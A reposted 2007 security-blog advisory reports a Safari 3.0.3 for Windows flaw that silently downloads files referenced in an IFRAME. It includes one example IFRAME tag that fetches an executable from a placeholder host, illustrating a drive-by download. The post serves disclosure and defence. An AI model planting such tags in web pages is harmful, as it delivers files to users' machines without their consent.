Tuesday, October 09, 2007 10:00 AM
cmosby
Zero-day Flaw in Safari 3.0.03 Web Browser for Windows - TrendLabs | Malware Blog
October 8th, 2007 by Lordian Mosuela
A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.
True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,
iframe src=”http://www.XXXX.com/XXXX.exe” mce_src=”http://www.XXXX.com/XXXX.exe” name=”iframe” id=”iframe”
Unlike IE and Firefox, which displays an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any sort of notification.
A behind the scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being commanded to download a file.
The flaw has potential for misuse and may become a possible source of violations of user rights against entities downloading files on a system without user consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.
Additional information provided by Leander Yu.
Source: Zero-day Flaw in Safari 3.0.03 Web Browser for Windows - TrendLabs | Malware Blog - by Trend Micro
Filed under: Security and Anti-Virus, Browser Wars, Internet Hacks